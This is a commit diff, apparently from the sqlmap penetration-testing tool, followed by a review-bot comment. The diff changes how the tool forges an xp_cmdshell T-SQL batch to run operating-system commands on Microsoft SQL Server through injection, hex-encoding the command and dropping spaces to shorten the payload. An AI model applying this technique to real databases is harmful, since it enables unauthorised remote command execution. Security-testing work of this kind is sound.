			
		
		
		
	hex-encoding the command is much shorter than unescaping with CHAR() for MSSQL; also, no spaces are needed between nested comments when forging the xp_cmdshell command to run
This commit is contained in:
		
							parent
							
								
									ff9e97a42c
								
							
						
					
					
						commit
						18be319d13
					
				|  | @ -14,6 +14,7 @@ from lib.core.common import popValue | ||||||
| from lib.core.common import randomStr | from lib.core.common import randomStr | ||||||
| from lib.core.common import readInput | from lib.core.common import readInput | ||||||
| from lib.core.common import wasLastRequestDelayed | from lib.core.common import wasLastRequestDelayed | ||||||
|  | from lib.core.convert import hexencode | ||||||
| from lib.core.data import conf | from lib.core.data import conf | ||||||
| from lib.core.data import kb | from lib.core.data import kb | ||||||
| from lib.core.data import logger | from lib.core.data import logger | ||||||
|  | @ -148,9 +149,9 @@ class xp_cmdshell: | ||||||
| 
 | 
 | ||||||
|     def xpCmdshellForgeCmd(self, cmd): |     def xpCmdshellForgeCmd(self, cmd): | ||||||
|         self.__randStr = randomStr(lowercase=True) |         self.__randStr = randomStr(lowercase=True) | ||||||
|         self.__cmd = unescaper.unescape("'%s'" % cmd) |         self.__cmd = "0x%s" % hexencode(cmd) | ||||||
|         self.__forgedCmd = "DECLARE @%s VARCHAR(8000); " % self.__randStr |         self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr | ||||||
|         self.__forgedCmd += "SET @%s = %s; " % (self.__randStr, self.__cmd) |         self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd) | ||||||
|         self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr) |         self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr) | ||||||
| 
 | 
 | ||||||
|         return self.__forgedCmd |         return self.__forgedCmd | ||||||
|  |  | ||||||
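Review bot: The new `"0x%s" % hexencode(cmd)` literal in xpCmdshellForgeCmd still has no length check, and the `VARCHAR(8000)` declared on the following line will silently truncate a command longer than 8000 bytes instead of failing; a guard such as `if len(cmd) > 8000: logger.warning("command exceeds the 8000-byte VARCHAR limit and will be truncated")` placed before the DECLARE would make that visible (8000 is the limit the hunk itself declares). Whether `hexencode` copes with a unicode `cmd` containing non-ASCII characters depends on lib.core.convert, which is not on this page, so the assumption that cmd is plain ASCII deserves a comment at the call site. The removed line was the only visible use of `unescaper`, so check that its import at the top of the file is not now dead — that part of the file is outside the hunk. The method also lacks a docstring; `"""Return a T-SQL batch that stores cmd, hex-encoded, in a VARCHAR(8000) variable and runs it through xp_cmdshell."""` would do.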
	
	